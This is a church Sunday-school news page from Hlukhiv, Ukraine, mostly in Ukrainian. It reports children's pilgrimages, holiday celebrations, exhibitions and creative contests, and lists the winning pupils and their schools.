ВОСКРЕСНАЯ ШКОЛА

ДЛЯ ПЕРЕХОДА НА САЙТ ДУХОВНО-ПРОСВЕТИТЕЛЬСКОГО ЦЕНТРА ВОСПОЛЬЗУЙТЕСЬ АДРЕСОМ:

http://glukhiv-dpc.sumy.sch.in.ua

This slideshow requires JavaScript.

6 червня відбулася поїздка вихованців Духовно-просвітницького центру до Києва. Метою поїздки було паломництво до Києво-Печерської Лаври та відвідування православного благодійного фестивалю «Божі діти», присвяченого Дню захисту дітей. Помолившись в Лаврі та приклавшись до мощей Києво-Печерських святих, маленькі глухівчани поїхали до Міжнародного центру культури і мистецтв Федерації профспілок України, куди з’їхалися на свято майже 2000 дітей з усієї України. Фестиваль відкрив Предстоятель Української Православної Церкви Блаженніший Митрополит Київський і всієї України Онуфрій. Він звернувся до присутніх з вітальним словом, у якому наголосив, що діти – це найбільший Божий дар, та побажав усім Божої допомоги та здоров’я, також закликав усіх бути милосердними та пам’ятати, що найбільшою серед чеснот є любов. Яскраві та незабутні враження справили на дітей виступи творчих дитячих колективів та заслужених і народних артистів України, а проникливий та зворушливий танець спортсменів параолімпійської збірної України не залишив нікого байдужим. В залі панувала суцільна атмосфера любові та добра. Дуже дякуємо всім організаторам та благодійникам за таке гарне свято, що об’єднує людські серця, адже всі ми – Божі діти.

11 січня до Духовно-просвітницького центру завітали школярі молодших класів ЗОШ №6. Діти з захопленням розглядали експонати виставки «За віконечком Різдво», в якій вони також прийняли участь. Викладачі центру підготували тематичну вікторину, під час якої діти узнали багато нового і цікавого про Різдво Христове. Потім школярі з радістю прославляли Іісуса Христа у своїх колядках. Святкова програма продовжилася переглядом лялькової вистави «Різдвяна пригода». На завершення свята були веселі конкурси з солодкими призами.

This slideshow requires JavaScript.

7 січня з благословення Митрополита Київського і всієї України Блаженнішого Онуфрія в Національній опері України відбулась Різдвяна благодійна святкова програма для дітей з різних куточків України. З Глухова така можливість випала вихованцям Духовно-просвітницького центру,в першу чергу дітям, які знаходяться під опікою, дітям з малозабезпечених сімей, дітям з обмеженими можливостями, а також активним учасникам благодійних акцій, що проводить центр. Ця поїздка справила на дітей незабутнє враження. Свято почалося прямо в фойє опери, діти були в захваті від шоу з мильними бульбашками, залюбки змагалися у вирізанні витинанок, з цікавістю розглядали унікальну виставку фарфору. Основна частина свята відбулася на сцені. Блаженніший Онуфрій привітав діток з Різдвом Христовим та закликав усіх жити в любові, мирі, злагоді, робити справи милосердя,після чого запросив до виступу дитячі колективи. Колядки, які звучали зі сцени, створювали святкову атмосферу, циркові номери надали бадьорості та веселого настрою, а театралізована вистава за мотивами твору Г.-Х. Андерсена змусила задуматися над одвічними цінностями. Наприкінці свята всі діти отримали солодкі подарунки. Настоятель Трьох-Анастасіївського Кафедрального Собору протоієрей Георгій Литвинюк, викладачі центру та батьки дітей висловлюють подяку народному депутату Андрію Леонідовичу Деркачу за організацію поїздки.

This slideshow requires JavaScript.

З метою духовного розвитку дітей та молоді викладачі Духовно-просвітницького центру в минулому році започаткували творчий конкурс «Радість добрих справ». Було розроблено положення, згідно з яким на конкурс приймаються твори (вірші, оповідання, казки), герої яких співпереживають та допомагають одне одному. Учасникам конкурсу необхідно не лише повідати якусь історію, але й дійти висновку, що робити добрі справи це дуже приємно та корисно для того, хто їх робить. Даний конкурс проводиться напередодні свята Миколая Чудотворця. Цього року в ньому прийняли участь 42 дітей з міста та району віком від 7 до 17 років. Всі твори були дуже гарні, подекуди, по-дитячому наївні. Деякі твори приємно вразили глибиною своїх роздумів. Загалом, діти показали, що вони добре розуміються на загальнолюдських цінностях та православних традиціях. Нагородження переможців конкурсу відбулося 25 грудня в приміщенні Духовно-просвітницького центру. Отець Володимир привітав діток, подякував їм за їх небайдужі серця, після чого усім учасникам вручив грамоти та подарунки. Далі на гостей чекала цікава театралізована вистава «Сирітка Оленка», яку підготували та показали вихованці театрального гуртка центру.

Списки переможців творчого конкурсу «Радість добрих справ»

І вікова категорія

Номінація «Кращий вірш»

І місце – Псюк Ангеліна, Березівський НВК

ІІ місце – Мовчан Карина, Березівський НВК

Пісоцький Андрій, Березівський НВК

ІІІ місце – Смоля Єгор, Будівельнівський НВК:ЗОШ-ДНЗ «Зернятко», Активна участь – Молдаван Анна, Березівський НВК

Номінація «Краще оповідання»

І місце – Андрійчук Данило, Березівський НВК

Науменко Єлізавета, Комунальний заклад Березівської сільської ради «Слоутський НВК:ЗОШ ДНЗ «Волошка»

ІІ місце – Богданович Єлізавета, Комунальний заклад Березівської сільської ради «Слоутський НВК:ЗОШ ДНЗ «Волошка»

Ковальов Іван, НВК: ДНЗ-ЗОШ І-ІІ ступенів №4

ІІІ місце – Мороз Вікторія,НВК: ДНЗ-ЗОШ І-ІІ ступенів №4

Активна участь – Юдіна Аміна, НВК: ДНЗ-ЗОШ І-ІІ ступенів №4

Тимоніна Марія, НВК: ДНЗ-ЗОШ І-ІІ ступенів №4

Іванова Юлія, НВК: ДНЗ-ЗОШ І-ІІ ступенів №4

Номінація «Краща казка»

І місце – Безбог Анастасія, Будівельнівський НВК:ЗОШ-ДНЗ «Зернятко»

ІІ місце – Рибалко Анна, Комунальний заклад Березівської сільської ради «Шевченківський НВК:ЗОШ ДНЗ «Суничка»

ІІ вікова категорія

Номінація «Кращий вірш»

І місце – Радченко Лада , Березівський НВК

ІІ місце – Чернишова Ірина, Ходинський НВК,

Лугинець Маргарита-Генріета, НВК: ДНЗ-ЗОШ І-ІІ ступенів №4

ІІІ місце – Ляшко Ангеліна, Комунальний заклад Березівської сільської ради «Слоутський НВК:ЗОШ ДНЗ «Волошка»

Лежавська Альона, Комунальний заклад Березівської сільської ради «Слоутський НВК:ЗОШ ДНЗ «Волошка»

Активна участь – Довгопола Анна, Комунальний заклад Березівської сільської ради «Слоутський НВК:ЗОШ ДНЗ «Волошка»

Білоусова Дарина, НВК: ДНЗ-ЗОШ І-ІІ ступенів №4

Яровий Костянтин, НВК: ДНЗ-ЗОШ І-ІІ ступенів №4

Номінація «Краще оповідання»

І місце – Будишевська Анастасія, Глухівська загальноосвітня школа-інтернат І-ІІІ ступенів ім. М.І.Жужоми

Троша Ангеліна, Глухівська ЗОШ І-ІІІ ступенів №6

ІІ місце – Гриценко Катерина, Глухівська загальноосвітня школа-інтернат І-ІІІ ступенів ім. М.І.Жужоми

Падеріна Катерина, Глухівська загальноосвітня школа-інтернат І-ІІІ ступенів ім. М.І.Жужоми

ІІІ місце – Тутук Анастасія, Будівельнівський НВК:ЗОШ-ДНЗ «Зернятко»,

Трофименко Дарина, Комунальний заклад Березівської сільської ради «Слоутський НВК:ЗОШ ДНЗ «Волошка»

Новіков ігор, Кучерівський НВК

Євдокименко Анастасія, Кучерівський НВК

Активна участь – Горова Анастасія, Березівський НВК

Шакотько Марина, Комунальний заклад Березівської сільської ради «Слоутський НВК:ЗОШ ДНЗ «Волошка»

Номінація «Краща казка»

І місце – Боровик Анастасія, НВК: ДНЗ-ЗОШ І-ІІ ступенів №4

ІІ місце – Довгопола Аліна, Комунальний заклад Березівської сільської ради «Слоутський НВК:ЗОШ ДНЗ «Волошка»

Євсєєв Ігор, , НВК: ДНЗ-ЗОШ І-ІІ ступенів №4

ІІІ місце – Гриценко Віталій, Комунальний заклад Березівської сільської ради «Слоутський НВК:ЗОШ ДНЗ «Волошка»

Крючик Марія, НВК: ДНЗ-ЗОШ І-ІІ ступенів №4

Активна участь – Кнуренко Яна, Комунальний заклад Березівської сільської ради «Слоутський НВК:ЗОШ ДНЗ «Волошка»

ІІІ вікова категорія

Номінація «Кращий вірш»

ІІІ місце – Самофал Анастасія, ГНПУ

Номінація «Краще оповідання»

ІІ місце – Таран Каріна, Комунальний заклад Березівської сільської ради «Слоутський НВК:ЗОШ ДНЗ «Волошка»

This slideshow requires JavaScript.

Весело та цікаво пройшли святкові ранки до дня Святого Миколая у Духовно-просвітницькому центрі. Так, 15 грудня відбулося свято для дітей середнього шкільного віку. Після розповіді вчителя про житіє Святителя Миколая діти мали змогу перевірити свої знання під час тематичної вікторини, яка проходила в ігровій формі «Дерево правди та неправди». Потім вихованці театрального гуртка показали театралізовану виставу «Сирітка Оленка». Не обійшлося і без поезії – багато чудових віршів про Миколая Чудотворця пролунало в святковій залі. На завершення свята були веселі ігри та конкурси з солодкими подарунками.

17 грудня пройшли два святкові ранки для дітей дошкільного та молодшого шкільного віку. Свято розпочалося з прем’єри вистави «Лист до святого Миколая», яку підготували вихованці музично-театрального гуртка для дошкільнят під керівництвом Олени Віноградової. Жвавими оплесками привітали глядачі маленьких акторів. Решта дітей також проявили свої таланти, співаючи пісні та розповідаючи вірші про Миколая Чудотворця. Свято продовжилося веселими розвагами та конкурсами. Наприкінці свята всі малята отримали солодкі подарунки.

8 грудня незвичним та неймовірно цікавим було заняття вихованців гуртка «Малювання» Духовно-просвітницького центру. Керівник податкової інспекції Ткаченко Тетяна Анатолівна, щоб створити атмосферу святковості та піднесеного настрою в залі для відвідувачів, запросила маленьких художників прикрасити вікна будівлі новорічно-різдвяними малюнками. Ця ідея всім прийшлася до смаку і Лідія Віталіївна Кирпичко разом зі своїми вихованцями взялися до роботи. Податкова на пару годин перетворилася на творчу майстерню. Діти, сповнені радощів та натхнення фарбами на склі малювали зимовий пейзаж із хатками та Дідом Морозом, що несе подарунки; тут і сніговичок, що котиться на санчатах, і снігурі на засніжених гілках, і Різдвяний янгол, що летить у зоряному небі. Дівчатка й хлопчики працювали не лише пензликами, а й своїми долоньками, штампами та звичайними кухонними губками. Створювати красу окрім педагога їм допомагали й батьки, яким цікаво було щось підфарбувати, піднести, намішати фарбу, а то й підтримати свою дитину на підвіконні, бо ж діти всі – від 6до 11 років. Та найкращим помічником все ж таки був гарний настрій та доброзичлива атмосфера. Порадував всіх і сам процес, і чудовий результат, і схвальні відгуки відвідувачів інспекції, і звичайно ж, солодкі подарунки в нагороду за старання.

This slideshow requires JavaScript.

Квіти для Богородиці

Завершилась виставка дитячих робіт «Квіти для Богородиці», яка проходила в Духовно-просвітницькому центрі. За цей період її відвідали близько 300 школярів міста та району. Організатори виставки влаштували для гостей справжнє свято, під час якого діти не тільки із захопленням розглядали експонати виставки, виконані в різних техніках, а й відвідали Собор Трьох Анастасій, де більше дізнались про свято Покрови Пресвятої Богородиці, змогли прикластись до ікон, поставити свічки. Також на дітей чекала тематична повчальна лялькова вистава, цікаві вікторини та конкурси. Хотілося б подякувати усім учасникам виставки, я їх налічувалось близько 200 чоловік. Компетентне журі підвело підсумки і вибрало 74роботи. 29 жовтня  відбулося нагородження переможців, яких привітав отець Володимир, вручив грамоти та подарунки. А потім вихованці театрального гуртка показали виставу «Мудрий батько», також не обійшлося без веселих конкурсів та солодощів.

Список переможців виставки «Квіти для Богородиці»

 1. Гричаник Валерія, Глухівська ЗОШ І-ІІІ ступенів №1.
 2. Довгаль Марія, Глухівська ЗОШ І-ІІІ ступенів №1.
 3. Воліна Катерина, Глухівська ЗОШ І-ІІІ ступенів №1.
 4. Семеха Марія, Глухівська ЗОШ І-ІІІ ступенів №2.
 5. Елісєєв Данило, Глухівська ЗОШ І-ІІІ ступенів №2.
 6. Біліченко Роман, Глухівська ЗОШ І-ІІІ ступенів №2.
 7. Курок Поліна, Глухівська ЗОШ І-ІІІ ступенів №2.
 8. Васильєва Настя, Глухівська ЗОШ І-ІІІ ступенів №2.
 9. Колектив 1 класу , Глухівський НВК: ДНЗ-ЗОШ І ступеня №5.
 10. Гугля Анна, Глухівська ЗОШ І-ІІІ ступенів №6.
 11. Мовчан Дарина, Глухівська ЗОШ І-ІІІ ступенів №6.
 12. Опанасенко Марина, Глухівська ЗОШ І-ІІІ ступенів №6.
 13. Гулакова Наталія, Глухівська ЗОШ І-ІІІ ступенів №6.
 14. Лата Катерина, Глухівська ЗОШ І-ІІІ ступенів №6.
 15. Пилипенко Діана, Глухівська ЗОШ-інтернат І-ІІІ ступенів ім. М.І. Жужоми .
 16. Шелкова Марія, Глухівська ЗОШ-інтернат І-ІІІ ступенів ім. М.І. Жужоми .
 17. Лісненко Дар’я, Глухівська ЗОШ-інтернат І-ІІІ ступенів ім. М.І. Жужоми .
 18. Стьопкіна Сніжанна, Глухівська ЗОШ-інтернат І-ІІІ ступенів ім. М.І. Жужоми .
 19. Дарченко Катерина, Глухівська ЗОШ-інтернат І-ІІІ ступенів ім. М.І. Жужоми .
 20. Бережний Віталій, Глухівська ЗОШ-інтернат І-ІІІ ступенів ім. М.І. Жужоми .
 21. Іллюченко Анна, МЦПО.
 22. Пустовойтова Аріна, МЦПО.
 23. Сильченко Олександр, МЦПО.
 24. Мамаєва Марія, МЦПО.
 25. Міхно Марія, МЦПО.
 26. Шумицька Настя, МЦПО.
 27. Тукін Володимир, МЦПО.
 28. Кельбас Настя, МЦПО.
 29. Артеменко Денис, МЦПО.
 30. Троша Ангеліна МЦПО.
 31. Рябко Лариса, Духовно-просвітницький центр.
 32. Володська Настя, Духовно-просвітницький центр.
 33. Маслюк Анна, Духовно-просвітницький центр.
 34. Шкурко Ліза, Духовно-просвітницький центр.
 35. Боголюбова Аліса, Духовно-просвітницький центр.
 36. Нахабич Анна, Слоутська недільна школа.
 37. Шакотько Марина, Слоутська недільна школа.
 38. Гриценко Віталій, , Слоутський НВК.
 39. Трофименко Дарина, Слоутська недільна школа.
 40. Колектив Слоутської недільної школи.
 41. Довгопола Анна, Слоутський НВК.
 42. Авдасьова Валерія, Слоутський НВК.
 43. Тур Ігор, Слоутський НВК.
 44. Шепет Альона, Слоутський НВК.
 45. Пата Діана, Слоутський НВК.
 46. Демченко Єлизавета, Соснівська недільна школа.
 47. Дмитренко Анна, Соснівська недільна школа.
 48. Бершова Юлія, Соснівська недільна школа.
 49. Кравченко Аліна, Соснівська недільна школа.
 50. Комар Михайло, Соснівська недільна школа.
 51. Колектив Соснівської недільної школи.
 52. Клепець Інна, Некрасівський НВК.
 53. Івченко Марина, Некрасівський НВК.
 54. Колектив недільної школи с. Білокопитове.
 55. Безбог Настя, недільна школа с. Білокопитове.
 56. Шумицька Варвара, недільна школа с. Білокопитове.
 57. Чала Ірина, Шевченківська недільна школа.
 58. Калініченко Анастасія, Шевченківська недільна школа.
 59. Колектив Шевченківської недільної школи.
 60. Стещенко Руслан, Перемозький НВК.
 61. Колектив учнів Студенецького НВК.
 62. Лавриненко Дарина, Березівський НВК.
 63. Андрійчук Данило, Березівський НВК.
 64. Кайдаш Галина, Суходільський НВК.
 65. Фаль Аріанна, Суходільський НВК.
 66. Колектив гуртка «Чарівний гачок», Обложківський НВК.
 67. Тутук Юлія, Будівельнівський НВК.
 68. Тутук Анастасія, Будівельнівський НВК.
 69. Самощенко Софія, Шалигінська ЗОШ І-ІІІ ступенів.
 70. Чернишова Ірина, Ходинський НВК.
 71. Колектив Бачівської недільної школи.
 72. Колектив гуртка «Малювання», Духовно-просвітницький центр.
 73. Колектив гуртка «Ліплення», Духовно-просвітницький центр.
 74. Колектив початкової недільної школи «Промінчики», Духовно-просвітницький центр.

 

This slideshow requires JavaScript.

14 жовтня до свята Покрови Пресвятої Богородиці в духовно-просвітницькому центрі при Соборі Трьох Анастасій відкрилась виставка дитячих робіт «Квіти для Богородиці». В ній представлені поробки, виконані в різних техніках учнями шкіл міста та району та вихованцями недільних шкіл. Перші відвідувачі виставки із захопленням розглядали експонати, викладачі центру показали тематичну лялькову виставу, провели різноманітні конкурси. Для вихованців духовно-просвітницького центру старшої і молодших груп було проведено осіннє свято з театральною виставою, вікторинами, музичними номерами. Виставка відкрита для всіх бажаючих до 30 жовтня.

3 вересня з благословення Преосвященнійшого Романа єпископа Конотопського і Глухівського в Духовно-просвітницькому центрі Глухівського благочиння відбувся семінар директорів та вчителів недільних шкіл єпархії. Перед проведенням семінару в Соборі Трьох Анастасій був відслужений молебень. Після чого владика Роман привітав усіх присутніх з початком нового навчального року та благословив на плідну працю на ниві православного виховання дітей та молоді. Програма семінару була насичена та цікава. Розглядаючи питання організації навчально-виховного процесу в недільних школах, вчителі обмінювалися досвідом та своїми міркуваннями, щодо покращення результативності їх роботи. В основній частині семінару  була презентація методичного посібника диякона Іллі Кокіна «Жизнь и Учение Господа Иисуса Христа», після чого кожна недільна школа отримала їх в подарунок.  Даними посібниками, а також православними дитячими книжками та дисками забезпечив  нас благодійний «Фонд братів Павліченко», за що ми їм дуже вдячні. Завдяки новій методичній літературі, в якій автор пропонує зробити заняття інтерактивними, коли діти будуть не просто слухачами, а активними учасниками навчально-виховного процесу,  заняття стануть цікавішими, а здобуті знання міцнішими. Цікавою та пізнавальною стала для  учасників семінару екскурсія до Собору Трьох Анастасій.  Після обідньої перерви увазі гостей було запропоновано переглянути люлькову виставу на православну тематику, якій передували невеличкі рекомендації щодо того, як можна використовувати ляльковий театр у навчально-виховному процесі недільних шкіл. Практичною частиною зустрічі став майстер-клас «Квіти України», під час якого усі бажаючі вчилися робити квіти з креп-паперу. З подарунками, чудовим настроєм та надією на подальші зустрічі учасники семінару роз’їхалися по домівках.   

БАЖАЄМО УСІМ ЦІКАВОЇ ТА ПЛІДНОЇ ПРАЦІ!  ДО НОВИХ ЗУСТРІЧЕЙ!

This slideshow requires JavaScript.

Папа, мама, я – православная семья!

9 июля в Духовно-просветительском центре при Соборе Трех Анастасий прошел праздник для самых маленьких воспитанников «Папа, мама, я – православная семья!». Данное мероприятие было посвящено дню памяти святых благоверных князей Петра и Февронии, которые являются покровителями семьи, любви и верности. Праздник проходил в виде конкурса между тремя семьями за звание «Самой дружной семьи». Остальные  дети с родителями были активными зрителями . Они задавали вопросы командам,  а также принимали участие в викторине и веселых конкурсах. Первым заданием  для команд была презентация своей семьи. Это было домашнее задание, с которым все участники справились блестяще. Родители поделились православными традициями своей семьи, продемонстрировали красочные коллажи с фотографиями паломничества, а дети рассказали, какие они знают молитвы. Нужно отметить, что этот опыт молодых воцерквленных семей был очень полезным и интересным для остальных присутствующих на празднике родителей. Во время следующих конкурсов участники показали свою ловкость, сообразительность и сплоченность. Папам пришлось ненадолго побывать в роли мам, мамы разделили увлечения пап, а дети поделились маленькими семейными секретами, рассказав, как ласково называют родители друг друга и своего ребенка. Очень умилительно было наблюдать за тем, как родители, чтобы порадовать своих чад, сами становились немножко детьми. Праздник получился очень радостным и душевным. А иначе и быть не могло, ведь он проходил под покровительством Петра и Февронии.   В конце мероприятия батюшка Владимир еще раз поздравил все семьи с праздником, после чего вручил  победителям грамоты и подарки.  Все присутствующие также получили в подарок иконки святых благоверных князей Петра и Февронии Муромских.

Вітаємо всіх з Днем Петра та Февронії!

8 липня   православна молодь Духовно-просвітницького центру  Глухівського благочиння  провела акцію «Вітаємо всіх з Днем Петра та Февронії». Акція проходила в центрі міста (на стометрівці). Вихованці центру підходили до людей різного віку і розповідали їм про православні традиції святкування дня любові та вірності, про небесних покровителів сім’ї –  святих благовірних князів Петра та Февронію Муромських. Вітаючи  перехожих зі святом, вони дарували усім тематичні буклети та солодкі ромашки, які  виготовили заздалегідь. В ході акції було розповсюджено 230 буклетів.

Біблейські притчі очима дітей

       

This slideshow requires JavaScript.

 З 5 по 15 квітня в Духовно-просвітницькому центрі при Соборі Трьох Анастасій проходила виставка дитячих малюнків «Біблейські притчі очима дітей». У виставці прийняло участь 19 вихованців центру. Діти малювали ілюстрації до таких притч: «О мытаре и фарисее», «О блудном сыне, «О сеятеле», «О немилосердном должнике», «О добром самарянине». Вихованці центру  дуже відповідально віднеслись до даного конкурсу. Деякі учасники намалювали по декілька малюнків. Всього налічувалося 32 експонати. Протягом десяти днів гостями виставки стали близько 200 чоловік. Переважно це школярі міста.    Спочатку діти разом зі своїми вчителями відвідали собор, де прикластись до ікон, поставили свічки  та ознайомитись з азами християнської етики.Поті м завітали до Духовно-просвітницького центру, де на них чекала незвична виставка та конкурсна програма. Після детальної  розповіді викладачів центру про притчі,  відображені в малюнках, діти повинні були відповісти на запитання вікторини та справитися з іншими тематичними завданнями. Учням було цікаво, вони дуже старалися і чудово впоралися з усіма конкурсними завданнями, за що отримали солодкі призи. Наприкінці заходу усі відвідувачі мали змогу віддати свій голос за малюнок, який йому найбільше сподобався. Для цього необхідно було лише  приклеїти спеціальну наліпку на паспарту.  По завершенню виставки, було підраховано усі голоси, та  визначено переможців конкурсу. Ними стали:

 • Душина Надія ( І місце );
 • Антипенко Марія ( І місце ) ;
 • Бала Владислав ( ІІ місце );
 • Апьонкіна Вікторія ( ІІ місце );
 • Троша Ангеліна ( ІІІ місце );
 • Сердюк Дарья ( ІІІ місце ).

Усі переможці отримають дипломи та подарунки.

МАСЛЯНА

This slideshow requires JavaScript.

9 березня в рамках проведення свята «Масляна» православна молодь Духовно-просвітницького центру Глухівського благочиння відвідала вихованців Шалигінської школи-інтернату. Свято розпочали з повчальної театралізованої вистави «Прощеное Воскресенье». А далі, як і годиться, були розваги, цікаві ігри та хороводи для малечі. Старші діти мали змогу проявити свої творчі здібності, дотепність та кмітливість під час конкурсів. Захід проходив в дружній атмосфері під веселу музику та тематичні пісні. Наприкінці свята всі отримали солодкі цукерки та пряники.

10 березня в Духовно-просвітницькому центрі Глухівського благочиння пройшло свято «Масляна» для вихованців молодшого та середнього шкільного віку. На початку заходу батюшка привітав усіх зі святом, розповів дітям про Сирну седмицю та Прощену неділю, звернувши особливу увагу присутніх на те, що напередодні Великого посту необхідно примиритися один з одним. Далі вихованці молодіжної групи показали театралізовану виставу «Прощеное воскресенье», після чого були веселі ігри та конкурси з призами та подарунками. Наприкінці свята усі поласували млинцями та цукерками.

12 березня в Духовно-просвітницькому центрі Глухівського благочиння пройшло свято Масляної для наймолодших вихованців. Дошкільнята залюбки переглянули повчальну лялькову виставу «Солом’яний бичок» про те, як звірятка пошкодували про свої погані вчинки та попросили вибачення у бабусі та дідуся.  А потім були цікаві ігри, веселі хороводи, призи та ласощі

13 березня  православна молодь Духовно-просвітницького центру Глухівського благочиння завітала в гості до вихованців недільної школи с. Білокопитово. Спочатку батюшка Леонід привітав усіх присутніх з Прощеною неділею та дав настанову підростаючому поколінню щодо Великого посту.Потім усім присутнім було запропоновано переглянути театралізовану виставу «Прощеное воскресенье». Не обійшлося і без веселих ігор та конкурсів з призами.Після розваг батюшка запросив усіх на святкову трапезу.

 

всесвітній день православної молоді.

15 лютого, у день Стрітення Господнього, ось вже протягом кількох десятиліть святкується всесвітній день православної молоді. Відсвяткували його і вихованці духовно-просвітницького центру Глухівського благочиння при Соборі Трьох Анастасій. Захід проходив у вигляді конкурсу «Православний ерудит», в якому змагалося 4 команди. На початку свята батюшка привітав молодь зі святом, благословив на добрі справи та побажав усім учасникам Божої помочі та успіхів на шляху духовного життя, здобуття необхідних для цього знань. Конкурс проходив у кілька етапів. Спочатку діти позмагалися у знанні з Закону Божого та основ християнства. Для цього команди отримали 17 тестових запитань, які необхідно було виконати за певний проміжок часу. В наступному конкурсі кожний учасник отримав ілюстрацію ікони, яку потрібно було «впізнати» та розповісти про відповідне свято. Наймолодші учасники змагалися у відгадуванні православних загадок та в «складанні» прислів’їв. Під час конкурсів вихованці центру проявили себе не лише як православні ерудити, але і як творчі особистості. Діти співали пісні про Бога та Пресвяту Богородицю, а також розповідали православні вірші та повчальні притчі, які підготували заздалегідь. Цікавим було і творче завдання виготовити закладку для Біблії, під час якого учасники проявили свою майстерність та фантазію. Веселим та цікавим для всіх був конкурс «Ноев ковчег», в ході якого учасникам необхідно було показати різних тварин за допомогою жестів. Усі конкурси оцінювало журі, до складу якого входили, як викладачі центру, так і батьки вихованців. Підвівши підсумки по кожному конкурсу, було визначено команду-переможця, учасники якої отримали дипломи та подарунки. Наприкінці святкової програми було чає пиття, під час якого молодь мала змогу поспілкуватися та поділилися своїми враженнями.

This slideshow requires JavaScript.

This slideshow requires JavaScript.

ПІДВЕДЕННЯ ПІДСУМКІВ

З 7 по 25 січня в Духовно-просвітницькому центрі Глухівського благочиння при Соборі Трьох Анастасій проходила виставка дитячих робіт «За віконечком Різдво». Учасниками заходу стали учні загальноосвітніх та недільних  шкіл міста та району, вихованці позашкільних навчальних закладів, а також діти-інваліди міського територіального реабілітаційного центру. На конкурс було представлено 223 роботи, виконані з різних матеріалів та в різних техніках. Вертепи та ангели, ялинки та віночки, виготовлені власноруч, яскраві малюнки,  та ще безліч різних поробок прикрашали виставкову залу. За кожною роботою відчувалося тепло, любов та бажання дітей прославити ім’я  Господа. Виставку відвідав Преосвященнійший Роман, єпископ Конотопський та Глухівський разом з духовенством  і був  приємно вражений високим рівнем майстерності юних учасників. Гостями виставки стали також усі бажаючі глухівчани та гості міста, зокрема: учні шкіл міста Глухова, вихованці недільної школи с. Соснівка, вихованці духовно-просвітницького центру м. Конотоп.  Хотілося б в котре подякувати усім учасникам виставки та привітати переможців. Всі роботи були дуже гарні і заслуговували на увагу і тому, журі було важко визначитися. Та все ж таки кращих поміж кращих було обрано. Церемонія нагородження переможців виставки відбулася 16 січня в духовно-просвітницькому центрі. Незважаючи на несприятливу погоду, більшість переможців з міста та району все ж таки потрапили на свято, де на них чекали дипломи переможців, подарунки та «Різдвяна казка» у виконанні молодіжної групи центру.

Cписок переможців виставки дитячих робіт

«За віконечком Різдво»

 1. Терещенко Тетяна, учениця ЗОШ №1
 2. Ащеулова Аліна, учениця ЗОШ №2
 3. Шумицький Олексій, учень ЗОШ №2
 4. Корнієнко Гліб, учень ЗОШ №2
 5. Кирпичко Вікторія, учениця ЗОШ №3
 6. Бугай Артем ЗОШ №6
 7. Якименко Ольга, учениця ЗОШ – інтернату ім.. Жужоми
 8. Лісненко Дар’я, учениця ЗОШ – інтернату ім.. Жужоми
 9. Понирко Елла, учениця ЗОШ – інтернату ім.. Жужоми
 • Бордюкова Катерина, учениця ЗОШ – інтернату ім.. Жужоми
 • Бордюков Костянтин, учень ЗОШ – інтернату ім.. Жужоми
 • Тукін Володимир, вихованець Духовно-просвітницького центру Кафедрального Собору Трьох Анастасій
 • Артюх Уляна, вихованка Духовно-просвітницького центру Кафедрального Собору Трьох Анастасій
 • Сердюк Дар’я, вихованка Духовно-просвітницького центру Кафедрального Собору Трьох Анастасій
 • Колектив гуртка малювання Духовно-просвітницького центру Кафедрального Собору Трьох Анастасій
 • Шум Олександра, вихованка МЦПО
 • Кургаліна Олександра, вихованка МЦПО
 • Нижник Марія, вихованка МЦПО
 • Сотніченко Артем, вихованець МЦПО
 • Троша Ангеліна, вихованка МЦПО
 • Бикова Анастасія, вихованка МЦПО
 • Гугліна Діана, вихованка МЦПО
 • Недобуга Анна, вихованка МЦПО
 • Целікава Ярослава, вихованка МЦПО
 • Хандій Катерина, вихованка МЦПО
 • Антипенко Марія, вихованка МЦПО
 • Міхно Марія, вихованка МЦПО
 • Іллюченко Анна, вихованка МЦПО
 • Пугач Дмитро, вихованець Глухівського міського центру соціальної реабілітації дітей інвалідів
 • Мажуга Оксана, вихованка Глухівського міського центру соціальної реабілітації дітей інвалідів
 • Колектив вихованців Глухівського міського центру соціальної реабілітації дітей інвалідів
 • Колектив учнів 5 класу Слоутського НВК
 • Ляшко Ангеліна, учениця Слоутського НВК
 • Журба Катерина, учениця Сопицького НВК
 • Колектив гуртка «Чарівний гачок» Обложківського НВК
 • Лежавський Микита, учень Іващенківського НВК
 • Колектив учнів 2-4 класів Бачівського НВК
 • Андрійчук Данило, учень Березівського НВК
 • Ямполець Данило, учень Березівського НВК
 • Жуковський Єгор, вихованець Березівського НВК-ДНЗ «Веселка»
 • Покотило Ірина, учениця Первомайського НВК
 • Нікітін Владислав, учень Будівельнівського НВК
 • Петрушко Ярослав, учень Шевченківського НВК
 • Євдокименко Анастасія, учениця Кучерівського НВК
 • Оленич Сніжана, учениця Кучерівського НВК
 • Колектив гуртка «Креативне рукоділля» Суходільського НВК
 • Колектив Недільної школи на честь Праведної Анни с. Білокопитово
 • Зюкіна Поліна, вихованка Недільної школи с. Соснівка
 • Андросова Поліна, вихованка Недільної школи с. Соснівка
 • Дмитренко Ангеліна, вихованка Недільної школи с. Соснівка
 • Колектив Недільної школи с. Соснівка

 

This slideshow requires JavaScript.

За віконечком Різдво

До Різдва Христового в Духовно-просвітницькому центрі Глухівського благочиння при Соборі Трьох Анастасій відкрилася виставка дитячих робіт «За віконечком Різдво». В даному заході прийняли участь діти загальноосвітніх та недільних  шкіл міста та району, вихованці позашкільних навчальних закладів, а також діти-інваліди міського територіального реабілітаційного центру. Виставка триватиме до 19 січня. Запрошуємо всіх глухівчан та гостей міста.

This slideshow requires JavaScript.

З метою духовного розвитку дітей та молоді Духовно-просвітницький центр Глухівського благочиння при Соборі Трьох Анастасій  до Дня Святого Миколая провів творчий конкурс  «Радість добрих справ». До участі було запрошено учнів шкіл міста та району. Учасникам необхідно було написати віршований твір або оповідання про добрі справи, які мали місце в житті дитини, або свідком яких вона була. Також це могла бути й історія з вигаданими персонажами. Головне, щоб в творі розкривалася тематика конкурсу, а саме: які почуття переповнюють серце людини, яка робить справи милосердя та поступається своїми інтересами заради ближнього. На конкурс було подано 35 робіт, з яких журі обрало 17 кращих. 19 грудня о 14.00 в приміщенні Духовно-просвітницького центру для учасників конкурсу відбулося «Свято Миколая». Діти, чиї роботи відзначило журі, отримали дипломи переможців та подарунки. Вихованці театрального гуртка подарували всім присутнім чудову виставу «Невдячний багач». Свято завершилося цікавими іграми та конкурсами с солодкими призами. Ми дуже вдячні всім учасникам за чудові твори, сповнені любові та добра, і сподіваємося на подальшу співпрацю. 

Список переможців творчого конкурсу до Дня Святого Миколая «Радість добрих справ». 

І вікова категорія ( 7 – 9 років) 

Номінація «Кращий віршований твір»

І місце – Єрмаков Олексій (8 років), учень Сопицького НВК;

ІІ місце – Якименко Вероніка ( 7 років), учениця Березівського НВК;

ІІІ місце –Шевель Софія (7 років), учениця Березівського НВК;

